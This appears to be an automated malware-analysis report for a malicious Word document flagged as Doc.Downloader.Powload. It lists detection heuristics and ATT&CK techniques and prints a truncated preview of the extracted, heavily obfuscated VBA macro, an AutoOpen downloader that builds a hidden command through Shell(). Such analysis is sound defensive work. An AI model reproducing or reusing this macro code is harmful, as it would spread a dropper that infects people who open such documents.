MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call to execute a command, likely to download and run a second-stage payload, as indicated by the ClamAV detection name 'Doc.Downloader.Powload-6665633-0'. The obfuscated script attempts to construct a command string, but its exact target is obscured.
Heuristics 7
-
ClamAV: Doc.Downloader.Powload-6665633-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6665633-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10332 bytes |
SHA-256: 415ec68b4fb4da81340930856d7ee7dd71bd0e1f2f53e2c21ce2ae4e757f7588 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iatXllNlCj" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "wiTZfXhjwwqSw" Function AfcozIPiWMf() On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next Error 44846 * FXGNtw * 40350 * vTRQo Error 54531 * bDzlH / 52027 / KrNtJB Error 35991 / mpPOj / wdbQm / cTzlmm GoYhPaUqIPu = "mD" + " /" + "v " + " /R" + " " + " " + " " + Chr(3 + 2 + 3 + 4 + 22) + " ^" + "s^Et " + "^ " + "^ " + " n" + "^a^5=" Error 34025 / PhRIBq EORmZia = "==^A^A" + "g^A" + "AI^" + "A^A" + "C^A^g" + "AA" Error NLOaN / Knujpa Error 38620 * nulTJc Error jzUQn * UNLjz * nirvVj / LHpwz nTzZtzSzvi = "I^A^A" + "CAgAA^" + "I^AA" + "C^" + "A^gA^" + "AIA^A" Error fKCPM / zUvPLJ / 98020 * WGbzjH MaVjo = "CAg" + "^A^A^" + "I" + "^" + "A" + "AC" + "A" Error jWUuM * LvKkBu zcKSz = "gAAI" + "^A^0^H^" + "A9^" + "B^weA^" + "g^" + "GA" + "^jB^A" + "dAE" Error vqGGrT * vBFmtV Error 89368 / DjUfKI Error dSrSu / zVAjG Error 78689 / PNidT * GkDSt * wnokTB Error 94566 / TRjYjY * 71362 / wbrfl dXAmktv = "^G^" + "A" + "^jB^Qf" + "^A^sD" + "Ar^BQ" + "Y^AUG" + "Ay^B^" Error 83761 * 4630 / LpWHA * 19780 LzzOECkKFMD = "g" + "Y^AsD" + "A" + "^zB" + "^Q^Q" + "^A^M" + "^FA^kA" + "AI" + "^A^0G^" AfcozIPiWMf = GoYhPaUqIPu + EORmZia + nTzZtzSzvi + MaVjo + zcKSz + dXAmktv + LzzOECkKFMD Error 62308 * vjoZb End Function Function lmclproGvjq() On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next Error 43549 / NEYZos Error WvGJop / ApmbAV hTTiumr = "AlBAd^A" + "^k^E^" + "AtAQ" + "Z" + "A^s" + "^G^AvBg" + "dA4GA" + "JBwO^" Error QABWR * tozfn iXIin = "A" + "kC" + "^Az^B" + "^QQ^AM" + "^FA" + "^k^AA" Error 55850 / bRhSdV Error 62215 * YkzfZ / GzrGI * qHjwCR ilNKzDE = "^" + "I" + "^" + "AwC^A^U" + "^B" + "^A^U^A" Error 4536 / SMvAjn Error wUUlwj / OPdYqO Error DlJAW / 53130 bGTwt = "0^GAk" + "^AAK" + "^" + "A" + "^U^GA" + "sBQ^a" + "^AYE" + "^" + "A^kBQ" + "Y^A8^G" + "AsB^g" Error NhRlj * mSAIK Error 37222 / JzUnC / 61905 * McssrP Error 75510 / HtizYQ mhILuiAfHT = "^bAc^H" + "^AvBA" + "R^A4" + "CA^x^B" + "gaA^Q" + "HA^kAw" + "^e^A^" + "k^H^AyB" + "AdA" + "s^HA" + "pA" Error 58767 / 80498 Error qFQjk / zACnAF / BFZtsK / fZAQE Error 63246 * kiJMpi baNnZE = "^AUA^" + "ME^" + "A^6B^A^" + "JA^ACA" + "^u^BQ" + "a^A^ACA" + "^U^BAU^" + "A^0" + "^GA^" + "k^AAK" Error 54501 * 21870 * 13027 * 67326 Error YTtdJW * 21204 * zlfdaQ / zbOzG aHwqjVm = "^A^g" + "G^A^" + "j^" + "BQY^" + "AUGA^" + "yBw" + "b^A" + "YGA^7^" Error nQJiiw * lbmsAj Error MJiuhX * LDFRcj / 85697 * TWApFN fwWiHTri = "A^w^" + "J^AU" + "^" + "GA4" + "BQZ^A" + "^4C^An^" + "A^" + "w^K^AIG" + "^A^3BA^" + "dAQC" + "Ar" Error tPAEqh / YbABp Error qHGEF * RTwtr * 37570 * 42646 Error SOLSFA / XcUVp / AjquuA * izIvS kGPsAjGIUjj = "A^w^" + "J^AwFAn" + "^AwKA^M" + "GA^" + "pB^A" + "^bAIGA" Error GMXLQ * JlqXSU Error djkjYT * CwYVq BNEzf = "1^B^A" + "c^" + "AoD^A^" + "2B^gbAU" + "G^A^" + "k^" + "A^Q" + "P^A" + "M^HAB^B" lmclproGvjq = hTTiumr + iXIin + ilNKzDE + bGTwt + mhILuiAfHT + baNnZE + aHwqjVm + fwWiHTri + kGPsAjGIUjj + BNEzf Error 11555 / zubBQ * zJZLr * 94582 End Function Function UpIsMEsFUhV() On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next Error 10142 / whFQI Error 21348 / mGBEQw / aXrfZX / tXUNm Error 20750 / cSBZw AizfofdKqz = "w^" + "U" + "AQC" + "^A7" + "A" + "^wJ" + "A^" + "g" + "DA^4^A" + "^A^O^Ac" + "C" + "A^g" + "AQPAAC" Error 58446 / CrBBUM Error zwTwn * RbzDmN * 57204 * 17352 Error 97585 / 38778 / 12815 * 30529 Error 70586 / 45777 GFnkibbv = "^" + "Ai^Bw" + "^dAQ^H" + "A" + "k^A" + "w" + "^O^ ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.